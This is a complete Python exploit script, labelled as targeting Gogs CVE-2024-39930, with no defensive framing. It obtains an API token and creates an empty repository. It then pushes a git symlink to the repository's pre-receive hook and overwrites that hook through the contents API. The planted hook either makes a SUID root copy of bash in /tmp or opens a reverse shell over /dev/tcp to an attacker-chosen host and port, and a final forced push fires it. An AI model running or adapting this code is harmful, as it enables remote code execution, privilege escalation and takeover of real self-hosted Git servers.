#!/usr/bin/env python3 import requests, base64, os, subprocess, tempfile, shutil, argparse, time, random, string, sys class Color: BLUE = '\033[94m' GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' BOLD = '\033[1m' END = '\033[0m' class GogsBypassExploit: def __init__(self, url, user, password, mode, lhost=None, lport=None): self.url = url.rstrip('/') self.user = user self.password = password self.mode = mode self.lhost = lhost self.lport = lport self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' }) self.token = None self.repo_name = None def _random_str(self, length=10): return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def log(self, status, msg): prefix = f"{Color.BLUE}[*]{Color.END}" if status == "ok": prefix = f"{Color.GREEN}[+]{Color.END}" if status == "err": prefix = f"{Color.RED}[-]{Color.END}" if status == "warn": prefix = f"{Color.YELLOW}[!]{Color.END}" print(f"{prefix} {msg}") def run(self): print(f"{Color.BOLD}{Color.YELLOW}--- GOGS CVE-2024-39930 ---{Color.END}") self.log("info", f"Target: {self.url} | Mode: {self.mode.upper()}") if not self._get_token(): self.log("err", "Failed to obtain API token.") return if not self._create_empty_repo(): self.log("err", "Repository creation failed even with bypass attempt.") return if not self._push_symlink(): self.log("err", "Git symlink push failed.") return sha = self._find_sha_robust() if not sha: self.log("err", "Symlink SHA not found. The push might have failed silently.") return if self._overwrite_hook(sha): if self.mode == "rev": self.log("warn", f"Triggering reverse shell to {self.lhost}:{self.lport}") self._final_trigger_force() print(f"\n{Color.BOLD}{Color.GREEN}[!!!] EXPLOIT SUCCESSFUL!{Color.END}") if self.mode == "suid": self.log("ok", "SUID binary should be at /tmp/rootbash") def _get_token(self): self.log("info", "Creating API Token...") res = self.session.post(f"{self.url}/api/v1/users/{self.user}/tokens", json={"name": f"t_{self._random_str(4)}"}, auth=(self.user, self.password)) if res.status_code == 201: self.token = res.json()['sha1'] self.session.headers.update({"Authorization": f"token {self.token}"}) self.log("ok", f"Token acquired: {self.token[:10]}...") return True return False def _create_empty_repo(self): self.repo_name = f"pwn_bypass_{self._random_str(6)}" self.log("info", f"Creating repository (Bypassing Auto-Init): {self.repo_name}") res = self.session.post( f"{self.url}/api/v1/user/repos", json={ "name": self.repo_name, "auto_init": False, "private": False } ) if res.status_code == 201: self.log("ok", "Empty repository shell created.") return True else: self.log("err", f"Server still returned {res.status_code}. Checking logs...") return False def _push_symlink(self): self.log("info", "Initializing local Git and pushing symlink...") target = f"/root/gogs-repositories/{self.user}/{self.repo_name}.git/hooks/pre-receive" tmp = tempfile.mkdtemp() try: auth_url = self.url.replace("://", f"://{self.user}:{self.password}@") opts = ["git", "-C", tmp] subprocess.run(["git", "init", tmp], capture_output=True) subprocess.run(opts + ["remote", "add", "origin", f"{auth_url}/{self.user}/{self.repo_name}.git"], capture_output=True) subprocess.run(opts + ["config", "user.email", "root@internal.local"], capture_output=True) subprocess.run(opts + ["config", "user.name", "root"], capture_output=True) os.symlink(target, os.path.join(tmp, "evil_link")) subprocess.run(opts + ["add", "."], capture_output=True) subprocess.run(opts + ["commit", "-m", "init"], capture_output=True) # Since the repo is empty, we must push to establish the master branch subprocess.run(opts + ["push", "-u", "origin", "master"], capture_output=True) self.log("ok", "Git push successful.") return True except Exception as e: self.log("err", f"Git error: {e}") return False finally: shutil.rmtree(tmp) def _find_sha_robust(self): self.log("info", "Locating symlink SHA...") time.sleep(1) res = self.session.get(f"{self.url}/api/v1/repos/{self.user}/{self.repo_name}/contents?ref=master") if res.status_code == 200: for item in res.json(): if item['name'] == "evil_link": self.log("ok", f"SHA Found: {item['sha'][:10]}") return item['sha'] return None def _overwrite_hook(self, sha): self.log("info", "Overwriting Git hook content...") if self.mode == "suid": cmd = "#!/bin/bash\n/bin/cp /bin/bash /tmp/rootbash\n/bin/chmod 4755 /tmp/rootbash" else: cmd = f"#!/bin/bash\nbash -i >& /dev/tcp/{self.lhost}/{self.lport} 0>&1" payload = base64.b64encode(cmd.encode()).decode() res = self.session.put(f"{self.url}/api/v1/repos/{self.user}/{self.repo_name}/contents/evil_link", json={"message":"update", "content":payload, "sha":sha, "branch":"master"}) if res.status_code in [200, 201]: self.log("ok", "Hook manipulated successfully.") return True return False def _final_trigger_force(self): self.log("info", "Triggering RCE via final push...") tmp = tempfile.mkdtemp() try: auth_url = self.url.replace("://", f"://{self.user}:{self.password}@") opts = ["git", "-C", tmp] subprocess.run(["git", "init", tmp], capture_output=True) subprocess.run(opts + ["remote", "add", "origin", f"{auth_url}/{self.user}/{self.repo_name}.git"], capture_output=True) with open(os.path.join(tmp, "pwned.txt"), "w") as f: f.write(self._random_str(15)) subprocess.run(opts + ["add", "."], capture_output=True) subprocess.run(opts + ["commit", "-m", "pwn"], capture_output=True) subprocess.run(opts + ["push", "-f", "origin", "master"], capture_output=True) self.log("ok", "Final trigger sent.") finally: shutil.rmtree(tmp) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--url", required=True) parser.add_argument("--user", required=True) parser.add_argument("--pass", dest="password", required=True) parser.add_argument("--mode", choices=["suid", "rev"], default="suid") parser.add_argument("--lhost") parser.add_argument("--lport") args = parser.parse_args() if args.mode == "rev" and not (args.lhost and args.lport): print(f"{Color.RED}[-] Error: --lhost and --lport required for rev mode.{Color.END}") sys.exit(1) GogsBypassExploit(args.url, args.user, args.password, args.mode, args.lhost, args.lport).run()